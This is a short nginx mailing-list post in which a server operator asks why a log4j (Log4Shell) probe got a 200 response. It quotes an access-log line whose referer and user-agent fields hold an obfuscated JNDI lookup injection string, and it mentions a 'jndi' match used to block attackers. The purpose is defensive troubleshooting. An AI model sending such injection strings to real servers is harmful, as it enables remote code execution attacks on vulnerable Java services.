200 html return to log4j exploit

lists at lazygranch.com lists at lazygranch.com
Mon Dec 20 04:02:08 UTC 2021

I don't have any service using java so I don't believe I am subject to
this exploit. Howerver I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.

200 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://}" "${${lower:jndi}:${lower:rmi}://}" "-"

    log_format  main  '$status $remote_addr - $remote_user
    [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
                      '"$http_user_agent" "$http_x_forwarded_for"';

That is my log format from the nginx.conf. 

I now have a map to catch "jndi" in both url and agent. So far so good
not that it matters much. I just like to gather IP addresses from
hackers and block their host if it lacks eyeballs,

More information about the nginx mailing list